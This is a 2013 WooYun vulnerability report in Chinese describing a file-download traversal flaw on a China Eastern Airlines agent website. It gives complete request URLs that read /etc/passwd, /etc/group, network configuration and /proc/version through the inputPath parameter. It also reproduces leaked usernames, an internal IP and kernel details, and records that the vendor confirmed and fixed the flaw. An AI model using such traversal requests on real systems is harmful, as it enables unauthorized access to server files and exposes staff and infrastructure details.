漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-040171
漏洞标题:东方航空某站文件遍历导致重要系统被下载
相关厂商:中国东方航空股份有限公司
漏洞作者: 霍大然
提交时间:2013-10-18 13:25
修复时间:2013-12-02 13:26
公开时间:2013-12-02 13:26
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:11
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-18: 细节已通知厂商并且等待厂商处理中
2013-10-18: 厂商已经确认,细节仅向厂商公开
2013-10-28: 细节向核心白帽子及相关领域专家公开
2013-11-07: 细节向普通白帽子公开
2013-11-17: 细节向实习白帽子公开
2013-12-02: 细节向公众公开
简要描述:
东方航空某站文件遍历导致重要系统被下载
详细说明:
问题站点:
http://ceagent.ceair.com/
一、passwd文件
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/passwd
好多用户啊;
二、sysctl
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysctl.conf
三、group
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/group
root:x:0:root
bin:x:1:root,bin,daemon
daemon:x:2:root,bin,daemon
sys:x:3:root,bin,adm
adm:x:4:root,adm,daemon
tty:x:5:
disk:x:6:root
lp:x:7:daemon,lp
mem:x:8:
kmem:x:9:
wheel:x:10:root
mail:x:12:mail
news:x:13:news
uucp:x:14:uucp
man:x:15:
games:x:20:
gopher:x:30:
dip:x:40:
ftp:x:50:
lock:x:54:
nobody:x:99:
users:x:100:
nscd:x:28:
floppy:x:19:
vcsa:x:69:
pcap:x:77:
utmp:x:22:
utempter:x:35:
slocate:x:21:
rpc:x:32:
mailnull:x:47:
smmsp:x:51:
rpcuser:x:29:
nfsnobody:x:4294967294:
sshd:x:74:
dbus:x:81:
haldaemon:x:68:
avahi-autoipd:x:101:
avahi:x:70:
apache:x:48:
ntp:x:38:
xfs:x:43:
gdm:x:42:
sabayon:x:86:
stapdev:x:102:
stapusr:x:103:
hw:x:500:
was:x:403:was7
wl:x:105:
ot:x:201:
os:x:203:
bk:x:205:
rd:x:206:
et:x:207:
cs:x:208:
ap:x:209:
nw:x:211:
tux:x:401:
mqm:x:402:
uni:x:111:
rduser:x:501:
op:x:212:
td:x:213:
jboss:x:214:
hexuan:x:12071:
lixue:x:10053:
zhangjin:x:12076:
四、网络信息:
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/sysconfig/network-scripts/ifcfg-eth0
DEVICE=eth0
ONBOOT=yes
USERCTL=no
BOOTPROTO=static
NETMASK=255.255.255.0
IPADDR=10.6.141.90
PEERDNS=yes
check_link_down() {
return 1;
}
五、services
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/etc/services
漏洞证明:
http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/proc/version
Linux version 2.6.18-128.el5 (mockbuild@hs20-bc1-7.build.redhat.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-44)) #1 SMP Wed Dec 17 11:41:38 EST 2008
修复方案:
对问题参数过滤
版权声明:转载请注明来源 霍大然@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2013-10-18 16:50
厂商回复:
十分感谢。
最新状态:
2013-10-21:已修复。